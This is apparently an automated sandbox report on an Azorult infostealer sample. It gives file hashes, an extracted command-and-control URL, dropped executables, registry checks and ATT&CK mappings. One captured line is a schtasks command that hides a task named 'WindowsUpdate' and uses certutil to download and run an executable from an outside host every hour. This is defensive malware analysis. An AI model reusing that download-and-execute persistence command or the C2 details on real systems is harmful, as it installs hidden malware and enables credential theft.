azorult | 18f0eeec4de09ac329406c8a6cc99763015cf654ebc5404bb6150f6cf879bcb8

General

Target

8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
Size

424KB
MD5

a9b6246022869177cb7d66177b2bb480
SHA1

8ba6987bd8e765df43142f5b7803c88eccc85faf
SHA256

18f0eeec4de09ac329406c8a6cc99763015cf654ebc5404bb6150f6cf879bcb8
SHA512

21ccb922e58aec1c1aac280e8335c925b4d0982286c97844590682729e6f33896076cf1dddac366ae466b78c2d02ad588241bc0b658072b6edcf78a363c419d5
SSDEEP

6144:37ecOvI7EzEGRtx516Zkc3a6ZXGokcG1W9TwfpkkUnbPJUDlm4aaEt2GoyN6pB+H:r5CEI6Z9a6Is19Twfp6nDwlmXlw5wc4

Score

10^/10

azorult infostealer trojan

Malware Config

Extracted

Family

azorult

C2

http://balaborka.com/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Executes dropped EXE 4 IoCs

Processes:

TELE.dllRTR.exeNBBB.dllmoom.exe

pid process

1812 TELE.dll
4504 RTR.exe
3732 NBBB.dll
4312 moom.exe

pid	process
1812	TELE.dll
4504	RTR.exe
3732	NBBB.dll
4312	moom.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

TELE.dllNBBB.dll

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	TELE.dll
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	NBBB.dll

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\moom.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\moom.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Moom.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Moom.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4324 schtasks.exe

pid	process
4324	schtasks.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

8ba6987bd8e765df43142f5b7803c88eccc85faf.exeTELE.dllNBBB.dll

description	pid	process	target process
PID 4220 wrote to memory of 1812	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	TELE.dll
PID 4220 wrote to memory of 1812	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	TELE.dll
PID 4220 wrote to memory of 1812	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	TELE.dll
PID 1812 wrote to memory of 4504	1812	TELE.dll	RTR.exe
PID 1812 wrote to memory of 4504	1812	TELE.dll	RTR.exe
PID 1812 wrote to memory of 4504	1812	TELE.dll	RTR.exe
PID 4220 wrote to memory of 3732	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	NBBB.dll
PID 4220 wrote to memory of 3732	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	NBBB.dll
PID 4220 wrote to memory of 3732	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	NBBB.dll
PID 3732 wrote to memory of 4312	3732	NBBB.dll	moom.exe
PID 3732 wrote to memory of 4312	3732	NBBB.dll	moom.exe
PID 3732 wrote to memory of 4312	3732	NBBB.dll	moom.exe
PID 4220 wrote to memory of 4324	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	schtasks.exe
PID 4220 wrote to memory of 4324	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	schtasks.exe
PID 4220 wrote to memory of 4324	4220	8ba6987bd8e765df43142f5b7803c88eccc85faf.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe
"C:\Users\Admin\AppData\Local\Temp\8ba6987bd8e765df43142f5b7803c88eccc85faf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4220

C:\Users\Admin\AppData\Local\Temp\TELE.dll
"C:\Users\Admin\AppData\Local\Temp\TELE.dll" -s -pfsdgsdfvsdzcxfsDC
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1812

C:\Users\Admin\AppData\Roaming\RTR.exe
"C:\Users\Admin\AppData\Roaming\RTR.exe"
3⤵
- Executes dropped EXE
PID:4504

C:\Users\Admin\AppData\Local\Temp\NBBB.dll
"C:\Users\Admin\AppData\Local\Temp\NBBB.dll" -s -pfsdgsdfvsdzcxfsDC
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3732

C:\Users\Admin\AppData\Local\Temp\moom.exe
"C:\Users\Admin\AppData\Local\Temp\moom.exe"
3⤵
- Executes dropped EXE
PID:4312

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /CREATE /SC MINUTE /MO 59 /TR "cmd.exe /C certutil.exe -urlcache -split -f http://asdfghjkl0.com/task_schedule.exe %TEMP%\task_schedule.exe && %TEMP%\task_schedule.exe" /TN WindowsUpdate /F
2⤵
- Creates scheduled task(s)
PID:4324

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Moom.exe
Filesize
35KB

MD5
c9390e3854911caf1e62713201edc91a

SHA1
e2fd4e0e57aadd4e5af3eec8ed33fd404ececbdc

SHA256
46b35ef08a27559aefa62de19391df8eee8535a94c17c82ff96b38d02f7520ba

SHA512
ecd7033da0f2fa756db3a48d9bb89e6b365a9b87b6434d590de8732c4d60bbb9ca8969a67c98e7e9c96be8b6d16ebe6723a3531c848fdd3fc534fe2e308472e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\NBBB.dll
Filesize
270KB

MD5
76c0d2b7eb5e12cf8be7afa8848a284b

SHA1
d618f76f93d1d86e68789e4f1bbccbb2f2271e97

SHA256
2e7aadf3967648baf07836eb464cafa4d74ef6ed6970b551c0bf719b01efc621

SHA512
bfca9b36d104a5135fe3a2dcb4e531e26e0b30c64fdef7740b96d142b9dc029916fe7041c2d31a90f03007d9b946828085847fc18d25cd8b2adc34f5f5564b54

Download Submit
C:\Users\Admin\AppData\Local\Temp\NBBB.dll
Filesize
270KB

MD5
76c0d2b7eb5e12cf8be7afa8848a284b

SHA1
d618f76f93d1d86e68789e4f1bbccbb2f2271e97

SHA256
2e7aadf3967648baf07836eb464cafa4d74ef6ed6970b551c0bf719b01efc621

SHA512
bfca9b36d104a5135fe3a2dcb4e531e26e0b30c64fdef7740b96d142b9dc029916fe7041c2d31a90f03007d9b946828085847fc18d25cd8b2adc34f5f5564b54

Download Submit
C:\Users\Admin\AppData\Local\Temp\TELE.dll
Filesize
318KB

MD5
4c1669be5280d41749bdd3f7ebf3900a

SHA1
6e2a5cb4f60225225eaf058fd6bfacc2a6fddc5e

SHA256
853d71aaa7d63fa30595ace49b8ace3c2439fd1c10ba59628f8a45c4226bc2f7

SHA512
4c0fcac3ffc6a95038042904da84ada5ab7ba0cb771e56a821aaa0735c14c6e99d5979b3a65c37fc95567c314aa1c039c84779379e569e90bf104720502d5d95

Download Submit
C:\Users\Admin\AppData\Local\Temp\TELE.dll
Filesize
318KB

MD5
4c1669be5280d41749bdd3f7ebf3900a

SHA1
6e2a5cb4f60225225eaf058fd6bfacc2a6fddc5e

SHA256
853d71aaa7d63fa30595ace49b8ace3c2439fd1c10ba59628f8a45c4226bc2f7

SHA512
4c0fcac3ffc6a95038042904da84ada5ab7ba0cb771e56a821aaa0735c14c6e99d5979b3a65c37fc95567c314aa1c039c84779379e569e90bf104720502d5d95

Download Submit
C:\Users\Admin\AppData\Local\Temp\moom.exe
Filesize
35KB

MD5
c9390e3854911caf1e62713201edc91a

SHA1
e2fd4e0e57aadd4e5af3eec8ed33fd404ececbdc

SHA256
46b35ef08a27559aefa62de19391df8eee8535a94c17c82ff96b38d02f7520ba

SHA512
ecd7033da0f2fa756db3a48d9bb89e6b365a9b87b6434d590de8732c4d60bbb9ca8969a67c98e7e9c96be8b6d16ebe6723a3531c848fdd3fc534fe2e308472e8

Download Submit
C:\Users\Admin\AppData\Roaming\RTR.exe
Filesize
118KB

MD5
aa851fc2d1246b0015345bd553df643c

SHA1
ad944725f80b16c115754128dd2f8d7ccc931bd9

SHA256
fa565648efcd87cf810f2d19c41b9e9ddd6e6f9e326a12c0cc657ae1da19c2c9

SHA512
48fccb77dc7fcea6ef564023c187bd44ad748ce1b1d0d812c80e918dc48c31d87174afb582e0c3f1f4ca84936e3ab482c101538695e58472b8ff69eb4d23c38e

Download Submit
C:\Users\Admin\AppData\Roaming\RTR.exe
Filesize
118KB

MD5
aa851fc2d1246b0015345bd553df643c

SHA1
ad944725f80b16c115754128dd2f8d7ccc931bd9

SHA256
fa565648efcd87cf810f2d19c41b9e9ddd6e6f9e326a12c0cc657ae1da19c2c9

SHA512
48fccb77dc7fcea6ef564023c187bd44ad748ce1b1d0d812c80e918dc48c31d87174afb582e0c3f1f4ca84936e3ab482c101538695e58472b8ff69eb4d23c38e

Download Submit
memory/1812-132-0x0000000000000000-mapping.dmp

Download
memory/3732-138-0x0000000000000000-mapping.dmp

Download
memory/4312-141-0x0000000000000000-mapping.dmp

Download
memory/4324-144-0x0000000000000000-mapping.dmp

Download
memory/4504-135-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads